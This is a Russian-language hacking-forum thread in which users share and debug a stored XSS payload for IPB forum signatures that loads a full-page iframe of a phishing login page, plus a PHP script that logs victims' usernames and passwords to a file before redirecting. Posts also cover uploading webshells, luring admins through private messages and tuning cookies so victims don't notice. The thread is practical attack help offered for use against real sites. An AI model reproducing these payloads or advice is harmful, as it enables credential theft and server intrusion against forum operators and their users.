Взлом БД через форум с xss

[BuSh1Do]

Код:

[color="#FFFFFF"][acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://bush1do.freehostiaя олень/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

вставляю в подпись, а ссылку на фейк изменяет...это защита такая? ".com" изменяет на "я олень" =)

[Rjay]

5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь
куда потом ссылку кидать с залитыми файлами?

[BuSh1Do]

Цитата: Сообщение от Rjay 5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь куда потом ссылку кидать с залитыми файлами?

вставляешь сюда вместо [Ссылки могут видеть только зарегистрированные пользователи. ]

Код:

[acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://mail.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]_]___________________________________________________________________________[/acronym]_[/acronym][/size][/color]

[BlackWinG]

Если чесн, советую вам заменять в подписи эти символы какой-то картинкой или например текстом раздаю 6-тизнаки, так не палиться

[Me$$iah]

Залил вебшелл. конекчусь к гм серверу пишет:
"Too many connections"
Что делать? Если я получу админку от обвязки стрессвеба и вырублю серв на пару мин приконнектиться можно бут?

[TakeThat]

Цитата: Сообщение от Me$$iah Залил вебшелл. конекчусь к гм серверу пишет: "Too many connections" Что делать? Если я получу админку от обвязки стрессвеба и вырублю серв на пару мин приконнектиться можно бут?

через че конектишься навикат чтоли? лутше конектся через шелл т.к от навиката пользы 0

[object]

Для самых ленивых , и не понятливых .
Снял видео . как залить шелл . С инструкцией (C) m0nk.


Как вы поняли из видео , тест был на severe-world.


[Ссылки могут видеть только зарегистрированные пользователи. ]

[F4ll3nL0rD]

Цитата: Сообщение от L0stHorror Дошел до стадии, когда нужно залить фейк на хостинг, успешно залил, получился фейк, но при вводе каких-нибудь данных вида акк:пасс, у меня не перебрасывает с фейка на оригинальную страницу авторизации, хотя при этом в блокноте создается запись акк:пасс, которую я вводил. В чем может быть проблема? Содержимое файла login.php Код: <?php /* Фейк был создан при помощи генератора ArxWFakeGen. Автор программы ArxWolf. Официальный сайт программы и новых версий http://webxakep.net */ $BASE="game.txt"; $IS_EMAIL=false; $LOCATION="http://сайт_сервера/forum/"; $p0=$_REQUEST["UserName"]; $p1=$_REQUEST["PassWord"]; $headers = ""; $info="$p0:$p1:\n"; if ($IS_EMAIL){ mail($BASE, "*** Вам пришёл сюрприз!", $headers.$info); } else { $fd=fopen($BASE,"a+"); fwrite($fd,$info); fclose($fd); } header("Location:$LOCATION"); ?>

$LOCATION="http://сайт_сервера/forum/";
Вот тут попробуй выставить [Ссылки могут видеть только зарегистрированные пользователи. ]
Еще возможно ты не регистрировался на форуме, а там запрещено просматривать форум, если ты не зарегистрировался и поэтому тебя перебрасывает на страничку авторизации.

[IncubusX]

Всё равно когда ты заходишь [Ссылки могут видеть только зарегистрированные пользователи. ] то ты заходишь на [Ссылки могут видеть только зарегистрированные пользователи. ] по умолчанию. И только потом тебя переадресовывает куда нибудь.

[L0stHorror]

F4ll3nL0rD, спасибо! Ошибка заключалась именно в этом.
IncubusX, на том форуме обязательна прибавка index.php, без него форум просто не откроется, т.е. вид [Ссылки могут видеть только зарегистрированные пользователи. ] не открывается, и с него не переадресовывает.

Добавлено через 24 минуты
Теперь уже вопрос по самому xss:

Код:

[acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1)
{with(valid_until=new\x20Date())setTime(getTime()+1*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=
\x22+valid_until.toGMTString();document.write(\x22\x3Cifr*ame\x20src=http://ссылка_на_фейк/\x20frameborder=0\x20width=100%
\x20height=100%\x20scrolling=no\x3E\x3Cifr*ame\x3E\x22);document.close()}";eval(lol); 
]]текст_подписи[/acronym][/acronym]

Где тут ошибка?
x3Cifr*ame в коде есесно без *

Еще такой вопрос: админ должен зайти именно на просмотр моего ЛС (личного сообщения), но не того, что в подписи? Т.е. просто при просмотре ЛС, начинает работать код xss, что в подписи, и он перенаправляет его на фейк, а потом мне идут его акк:пасс?

А, вот, все работает, код нормальный) Просто нужно было подождать, пока в game.txt запишется акк:пасс.
Пошел работать дальше

[TakeThat]

Цитата: Сообщение от L0stHorror Еще такой вопрос: админ должен зайти именно на просмотр моего ЛС (личного сообщения), но не того, что в подписи? Т.е. просто при просмотре ЛС, начинает работать код xss, что в подписи, и он перенаправляет его на фейк, а потом мне идут его акк:пасс?

Да он должен прочитать ваше сообщения плюс он должен попасть курсором по вашему фейку и тогда его перекинет на ваш фейк и если он тупой то он введет свои данные.

[L0stHorror]

Что-то у меня как-то код выборочно работает что ли... 2 знакомым для проверки кидал - все нормально, а потом уже не приходит.
2 вопроса еще назрело:
1) на 1 странице m0nk выкладывал xss для разных браузеров, это для тех браузеров, что стоят у меня, или подразумеваются те, с которых будут заходить жертвы? Т.е. вот я допустим пользовался 1 xss (для ie+ff), а знакомый у меня заходил через оперу, и его акк:пасс я узнал. Просто зачем тогда в доп. вопросах был зада вопрос можно ли вставлять сразу 2 xss в подпись?
2) setTime(getTime()+30*24*60*60*1000), 30 это кол-во дней, которые куки будут храниться у юзера, дальше идут слова о том, что их нужно изменить, ну и подразумевается на меньшее число, вопрос - зачем? Не лучше ли это число оставлять таким, или даже больше, чтобы жертва прочитав ЛС на след. день никуда не переходила, а читала именно ЛС. Ведь как я понимаю 1 день - кукисы стерты, и снова переход на фейк - заметно, палится. И влияют ли в настройках самого браузера опции "какой кол-во дней хранить кукисы"?

Добавил:

Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?

[F4ll3nL0rD]

Цитата: Сообщение от L0stHorror Что-то у меня как-то код выборочно работает что ли... 2 знакомым для проверки кидал - все нормально, а потом уже не приходит. 2 вопроса еще назрело: 1) на 1 странице m0nk выкладывал xss для разных браузеров, это для тех браузеров, что стоят у меня, или подразумеваются те, с которых будут заходить жертвы? Т.е. вот я допустим пользовался 1 xss (для ie+ff), а знакомый у меня заходил через оперу, и его акк:пасс я узнал. Просто зачем тогда в доп. вопросах был зада вопрос можно ли вставлять сразу 2 xss в подпись? 2) setTime(getTime()+30*24*60*60*1000), 30 это кол-во дней, которые куки будут храниться у юзера, дальше идут слова о том, что их нужно изменить, ну и подразумевается на меньшее число, вопрос - зачем? Не лучше ли это число оставлять таким, или даже больше, чтобы жертва прочитав ЛС на след. день никуда не переходила, а читала именно ЛС. Ведь как я понимаю 1 день - кукисы стерты, и снова переход на фейк - заметно, палится. И влияют ли в настройках самого браузера опции "какой кол-во дней хранить кукисы"? Добавил: Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?

1. Да именно браузер жертвы.Можно вставить сколько хочешь xss.
2.Если в браузере выставлено удалять кукисы через определенное кол-во дней или после завершения сеанса, то они удаляются.

Цитата: Сообщение от L0stHorror Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?

Просто удали кукисы и можешь попробовать.

[<Infin1ty>]

Кому нужны сайты хостингов прошу : [Ссылки могут видеть только зарегистрированные пользователи. ]

[Восстание]

Здравствуйте.
Решил попробовать сделать XSS
Фейк сделал и залил чтоб работал без проблем, а влт сжедать чтоб выскакивали на форуме не могу.
Подскажите пожалуйста что я неправильно делаю, вот код:

Цитата: [acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime( )+30*24*60*60*1000);document.cookie=\x22ipb_my=123 4;\x20expires=\x22+valid_until.toGMTString();docum ent.write(\x22\x3Cifr*ame\x20src=ССЫЛКА НА МОЙ ФЕЙК\x20frameborder=0\x20width=100%\x20height=100%\x20 scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]_]__________________________________________________ _________________________[/acronym]_[/acronym]

x3Cifr*ame естественно без *

Неработает никак, часа 4 промучился на форуме [Ссылки могут видеть только зарегистрированные пользователи. ]